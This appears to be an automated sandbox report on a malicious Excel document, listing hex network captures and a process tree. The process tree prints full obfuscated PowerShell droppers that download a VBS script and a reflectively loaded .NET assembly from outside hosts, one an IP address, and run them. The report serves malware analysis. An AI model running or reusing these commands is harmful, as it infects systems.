                                                                                                                                                  2024-11-18 17:22:17 UTC8192INData Raw: 52 f2 85 5f 32 50 0d 86 ea 30 30 75 3e 21 a6 d0 c2 da 99 de 96 25 dd 67 8c f2 90 6a 5f ed df 8e 09 59 d9 74 1a 56 52 aa 2c 06 20 df 5c f4 5e 33 e0 b1 78 9c 2d a7 9d 59 62 3e d8 3f b3 fe 0b 07 80 68 46 9a 01 60 b1 6d c4 73 80 8f d9 f6 30 7e d5 7e d2 18 d4 22 2e 96 11 43 a8 1b 12 b3 37 c4 de 6d 57 db 19 34 ef fb a8 e4 f1 66 67 70 d4 db be e8 a1 7e 34 c3 71 cb f8 33 b7 ff 00 75 6f 1f 9d 1a 80 d3 22 15 3d f8 8f 9f a6 d3 8b eb 75 25 3e dc 47 1b 10 37 f8 ae fd ec 3d 5f fd 8a 82 af a5 7a b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31 ef b0 9f 66 e5 56 3e 29 ad 2e b3 ee 23 6b 5d 91 ef 8f 7d b6 3b 7e d3 fd 99 2c a0 de a4 02 48 e8 3c c8 b9 fd 2b 3d bb ec 8d 18 91 c0 14 68 7f 2c 07 62 d7 b9 50 09 0c 17 b8 3d 46 5b ef 85 1c b2 38 dc d5
                                                                                                                                                  Data Ascii: R_2P00u>!%gj_YtVR, \^3x-Yb>?hF`ms0~~".C7mW4fgp~4q3uo"=u%>G7=_z0bxxZx|{e1fV>).#k]};~,H<+=h,bP=F[8
                                                                                                                                                  2024-11-18 17:22:17 UTC8192INData Raw: d0 c4 b2 03 65 29 76 82 3b 8c 0c d3 09 40 49 0a c2 e8 73 95 68 dd 58 18 f6 af c9 b0 ce ca 5b 6a a8 60 0f 6e f9 c1 0b be dd a3 69 e0 81 80 b4 bb d5 b9 21 af 06 01 62 0d 0f cf 1d 4d 23 b8 65 28 d4 bc 0f 8e 0d f4 cf 13 1b 8d a8 0c 01 02 0c 4c a1 45 df 5c 09 14 79 c7 a4 45 83 61 11 93 bc 6e c5 64 52 18 92 b5 b8 d8 17 80 2a c6 b4 b1 99 37 25 75 ca e9 e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61 01 5d c0 f3 d7 34 a4 68 e7 76 21 29 82 51 23 bf 3d 71 72 10 25 94 e5 4e db 27 ae 06 49 82 47 8c ca 5b 75 7b 0e 41 c2 e8 d6 4d 42 3c 21 a8 8e 6c 9a fa 73 8d e8 b4 52 3e aa
                                                                                                                                                  Data Ascii: e)v;@IshX[j`ni!bM#e(LE\yEandR*7%ugmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>
                                                                                                                                                  2024-11-18 17:22:17 UTC8192INData Raw: d2 4f 61 db 17 3a 58 9b 52 66 2b ea 3c 11 db ae 03 45 ac f3 f4 b1 06 a5 23 d2 c0 9a e7 1e 8e 30 ef 74 c3 67 35 5c 1f ae 01 07 2c c3 d2 a0 0d a3 28 c4 c6 a5 c4 4e c6 c2 9d bd 4f 38 c4 70 29 66 91 63 60 58 5b 5f 7c e3 26 d1 75 c5 50 18 19 fa b1 a4 69 94 f9 32 09 d0 12 c0 2f 0c 2b 8b c4 f5 7a 38 27 89 de 3d 30 69 5b e3 ca f1 ed 9b f0 c7 68 f2 79 45 b7 f3 c7 c0 e2 5a f9 d6 1d 36 d0 8e ac 0e ef 4d 5d 76 c0 ca f0 9d 1c 7a 4f 14 d2 c4 ed 73 95 2c 4f f8 7d 2d fd b3 d4 c4 cf 26 9d de 66 20 ab 12 0f 4e 33 cd 78 76 ad e7 f1 18 5e 54 6b 24 ae e3 d3 a1 eb 9e 8b 50 ae 63 6f 2c da b2 95 e7 b6 00 60 9d f5 b0 4f 1a 3f 97 21 6a 46 6e e3 3c b6 a3 57 ad d1 6b 0c 33 3b 20 56 ea 7a 37 39 bd a0 d1 cb a6 12 1d e5 94 35 ad 9e 98 97 8e 46 d3 e8 d8 be d2 ea f4 19 ba 8c 0c 2f 17 97
                                                                                                                                                  Data Ascii: Oa:XRf+<E#0tg5\,(NO8p)fc`X[_|&uPi2/+z8'=0i[hyEZ6M]vzOs,O}-&f N3xv^Tk$Pco,`O?!jFn<Wk3; Vz795F/
                                                                                                                                                  2024-11-18 17:22:18 UTC8192INData Raw: 60 73 90 fa c9 9c 28 14 aa aa ab 55 77 b4 0e bf 0e 30 2c fa 78 a1 05 ce f2 00 8a 80 6a 3b 99 6c f3 f4 c4 f5 0a 63 9a 48 c9 e5 58 af cc 03 86 3a c9 83 17 f3 03 12 14 10 ca 0d d0 e3 8c 59 9c c8 cd 64 96 63 64 93 d4 e0 51 48 0c 2f a0 cd 4d 3e 8c 6b 5d 3c b7 50 cc c3 d2 48 15 c7 c7 33 50 ec 70 dd 6b 36 34 8e 4c aa e8 42 fa a3 e8 4d 8f 49 be d8 06 1b 3c a5 69 91 54 af a4 95 37 b8 5f 04 f3 8b 6b a2 02 64 a3 4b d8 91 d3 e9 96 4a 58 4b 79 ac 15 40 24 df 3d 7e 23 29 20 fb c2 a5 b9 a6 70 ad 62 88 3f d7 00 2f 0a c0 4a f9 85 9c a9 53 c7 e1 3d 70 02 0d ac 40 e7 a7 27 db 2d 2f 96 aa c1 0b 07 56 3b ac f0 d7 9c ec cc 1c 79 85 8a d1 f6 b1 58 01 54 69 5c db 50 b3 c9 3d 32 bb 0e e0 07 3c d6 50 80 00 e6 ec 5e 12 30 80 8d cc 41 f6 18 04 11 9b db 77 87 8d 12 32 77 28 dc 3d f3
                                                                                                                                                  Data Ascii: `s(Uw0,xj;lcHX:YdcdQH/M>k]<PH3Ppk64LBMI<iT7_kdKJXKy@$=~#) pb?/JS=p@'-/V;yXTi\P=2<P^0Aw2w(=
                                                                                                                                                  2024-11-18 17:22:18 UTC8192INData Raw: eb d5 15 9a 08 38 fc 44 29 ff 00 d5 99 e5 ab 80 6b 29 23 6e e0 9b 07 8c 0d 78 fe d1 ea 9c 06 11 c4 41 ff 00 2b 7f ea ce 1f 69 75 8c 48 f2 e1 00 7b ab 7f ea cc 42 5a 3a 28 c2 ba 10 72 ea ca 58 75 b3 f9 60 6d 0f 1d d4 b8 63 b2 05 50 38 01 5b 9f fc 58 6d 5f 8b ea 56 14 6a 8b 6f 5a da dd 6b fd ec c2 de a7 83 84 d5 ea 12 58 d1 0d d2 fb 60 6a 45 e3 5a 93 15 85 89 7e 1b 5b 9f d7 05 ff 00 c4 5a c8 9a 8c 70 8f 9a b7 3f ae 66 a1 60 a1 d0 31 5e d7 95 91 83 7e 21 47 df 03 5c fd a4 d6 37 58 74 d7 d8 ed 6b ff 00 cd 99 5a 9d 42 ce ed 23 46 aa 5b f1 6d ba 27 df 92 70 61 2a 2b dd 67 b6 0a 6b 11 30 3d eb f9 e0 54 4e 88 0d 7a 89 ca c7 3b 33 ed 23 86 e3 07 14 5e 63 10 4d 57 be 11 f4 bb 3a ba ee 3d 00 c0 d3 84 8d 62 a6 8e 46 55 97 a4 32 1e ab fe 56 f8 1e df 1a c4 25 32 46 de
                                                                                                                                                  Data Ascii: 8D)k)#nxA+iuH{BZ:(rXu`mcP8[Xm_VjoZkX`jEZ~[Zp?f`1^~!G\7XtkZB#F[m'pa*+gk0=TNz;3#^cMW:=bFU2V%2F
                                                                                                                                                  2024-11-18 17:22:18 UTC8192INData Raw: d6 ac aa 55 03 12 4d fb 66 86 86 67 4d 46 9b 51 40 3c 6e ae 55 bf 8a 8d d5 e0 7a 76 fb 1e b2 b8 77 f1 07 da 2c 8a 88 f2 6c 71 f8 b1 f3 f6 41 15 09 1a d2 19 89 24 98 f8 e7 fe 2c ca 4f b4 88 fa f4 69 b4 f1 ab 21 25 49 70 78 26 88 fc 37 5c ee e2 bf 0f d3 17 f1 7f b6 fe 25 0c cb 14 0d a4 23 6e e2 ea 8d d4 9e 9e aa e9 f2 c0 d0 8b ec e2 6a a4 95 13 5e 08 8d b6 86 10 d8 35 d4 83 ba b8 36 3e 04 66 80 fb 11 a7 a8 a5 6d 7c a2 3a da ca 10 6e 2d 47 90 7b 7e 47 3c b7 87 fd b2 d5 a6 a2 41 21 d1 42 8e db c8 68 98 aa 9f e2 00 2d 9f 51 25 8f c6 f3 7e 2f b6 0f 24 71 a0 d5 f8 63 11 d4 04 99 5a ab 8a f4 9e 87 01 6f b4 be 11 e1 5e 09 e1 32 c9 b1 a6 92 40 a8 8a ee 78 20 75 e2 bd f0 bf 65 3e cd 45 0e 88 6a b5 9a 74 92 49 79 02 54 0d 43 e1 77 98 9f 68 bc 62 2f 18 f1 5d 34 46 48
                                                                                                                                                  Data Ascii: UMfgMFQ@<nUzvw,lqA$,Oi!%Ipx&7\%#nj^56>fm|:n-G{~G<A!Bh-Q%~/$qcZo^2@x ue>EjtIyTCwhb/]4FH
                                                                                                                                                  2024-11-18 17:22:18 UTC8192INData Raw: 15 0a 40 00 8a c2 20 2a 6c 9a c3 b8 47 8c 30 e6 87 e5 80 00 f7 36 3d fd b0 38 90 58 ee dd cf 7c bc 50 b3 ab 51 20 0e 09 38 23 4a c0 ef be 7d b1 b4 2c 61 20 74 ea 6b 01 27 4a 60 a1 79 ef 96 2c 7d 23 6f 00 59 18 f5 22 c3 b9 56 df 16 30 1d bc 35 92 6f fe 98 00 2e 59 85 70 07 4c 32 15 5e 88 6f f8 58 0e 0e 0d a2 da dc 91 cf 51 8c e9 ca 83 19 91 bd 1b 49 f6 a3 78 05 2a 59 95 c4 65 5c 0f 50 ae 0f 18 67 54 3a 6b 0a 43 b7 6e e7 2b 33 bc 4c 5e 36 dd b8 5f 1c f1 82 4d 5a 3a 94 92 3d a6 ef 77 5a c0 4d 96 40 e1 c8 22 8f 52 33 5e 27 f3 21 d9 18 62 c4 75 3d b3 37 52 e0 c6 42 22 95 bb 0c 07 39 48 f5 93 47 d0 90 0f b6 03 fb 25 da 54 b9 a5 e4 df 19 d2 38 30 87 95 d4 b0 fc 23 07 a6 d4 34 ed 27 9c d6 08 ae bc e2 8c 8d e6 ec 76 24 5f 03 00 e9 2b ca f7 e9 a5 3e 91 8e c5 12 82
                                                                                                                                                  Data Ascii: @ *lG06=8X|PQ 8#J},a tk'J`y,}#oY"V05o.YpL2^oXQIx*Ye\PgT:kCn+3L^6_MZ:=wZM@"R3^'!bu=7RB"9HG%T80#4'v$_+>
                                                                                                                                                  2024-11-18 17:22:18 UTC8192INData Raw: 6c e5 d2 cd 20 42 36 d3 32 80 a1 80 22 f8 04 8b b0 30 0a 0c 07 48 db b9 98 35 2f 24 6e 1d 6f e9 55 ff 00 16 5a f4 6a d0 0d b4 0a 92 ed 6d 5b b6 d0 07 bd 58 0c 6b 9a 62 3b 60 23 d2 bc 88 ac bb 44 6d 62 c9 00 02 2b f1 13 40 75 19 03 4f 21 12 7a 05 46 00 66 24 50 b0 6b 9e 95 80 e4 92 e9 18 c8 a3 ca 4a d3 ed 04 2b 51 70 f6 6a ec f2 01 16 79 e7 29 aa 7d 33 ee 78 96 25 2c fb 82 a2 b5 a8 37 c1 be 2f a7 4c 5a 68 9e 16 3e 64 61 68 d1 00 8e 3d b8 be 32 a1 b7 b0 55 51 67 a0 3d f0 2f a7 2a 24 0c 58 a8 a2 2c 13 dc 11 cd 76 f7 f8 5e 68 7d e6 35 88 ac 72 6c 5f bb f9 67 6d d6 ed f6 6a fe 17 d7 32 84 12 34 42 40 14 0e 48 05 80 26 8f 34 3a 9c 1a b0 0b 43 92 dc fc b0 34 f5 3a 94 10 33 47 29 df 71 ed bf 75 5a 3f cf 14 7d 53 b4 f2 ea 03 d3 39 63 7f ef 58 3f a1 39 4a 12 a0 55
                                                                                                                                                  Data Ascii: l B62"0H5/$noUZjm[Xkb;`#Dmb+@uO!zFf$PkJ+Qpjy)}3x%,7/LZh>dah=2UQg=/*$X,v^h}5rl_gmj24B@H&4:C4:3G)quZ?}S9cX?9JU
                                                                                                                                                  2024-11-18 17:22:18 UTC8192INData Raw: da c8 c7 76 da 2d db df 15 01 96 e8 f5 fa e7 32 17 6d cd c9 aa e9 81 29 34 01 76 b4 60 80 78 3b 7b 63 08 b2 70 c5 53 69 e9 cf 41 f9 60 12 26 24 00 a0 fd 31 83 1c 8c 95 b4 a8 1d 41 e8 70 00 5d de 67 58 90 3a 01 c0 6e c4 73 7f a6 71 78 a5 01 1a 2d 8d 56 42 8a e7 e1 86 8a 12 84 9a 20 9c a9 88 99 37 b7 22 ee c6 00 c6 9e 5f bb 28 2e c5 8b 7a 40 36 70 b0 ab bc b1 c2 5b d4 0b 7a 88 eb 78 c4 0d 72 2b 46 ca ac aa 54 06 07 be 40 d2 56 a8 53 82 6f a1 27 8c 03 19 6a 65 2c 69 8b ec 23 e0 06 1d a4 0a 36 16 0a 84 10 5a b9 07 b6 55 a0 24 f9 b2 d9 0a 79 00 73 ed 7f 1c 95 8d 9e 59 15 56 96 81 56 61 c1 04 57 4c 0c ff 00 13 9e 51 e5 02 77 46 56 98 a8 e1 be 38 ac a2 99 d2 95 4b 05 a5 51 57 9b 3a 9d 2b 34 2b 19 6b 01 40 6b 18 8b e9 01 93 7b 29 63 6a b4 79 3e d8 09 78 7c 86 39
                                                                                                                                                  Data Ascii: v-2m)4v`x;{cpSiA`&$1Ap]gX:nsqx-VB 7"_(.z@6p[zxr+FT@VSo'je,i#6ZU$ysYVVaWLQwFV8KQW:+4+k@k{)cjy>x|9


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:12:21:06
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                  Imagebase:0x13f130000
                                                                                                                                                  File size:28'253'536 bytes
                                                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:12:21:29
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                  Imagebase:0x13f930000
                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:12:21:34
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:12:21:38
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:12:21:40
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline"
                                                                                                                                                  Imagebase:0x13f040000
                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:12:21:41
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B07.tmp" "c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP"
                                                                                                                                                  Imagebase:0x13fc80000
                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:12:21:46
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
                                                                                                                                                  Imagebase:0xffec0000
                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:12:21:48
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:15
                                                                                                                                                  Start time:12:21:50
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                                                                                                  Imagebase:0x2f0000
                                                                                                                                                  File size:2'525'680 bytes
                                                                                                                                                  MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:12:21:50
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, 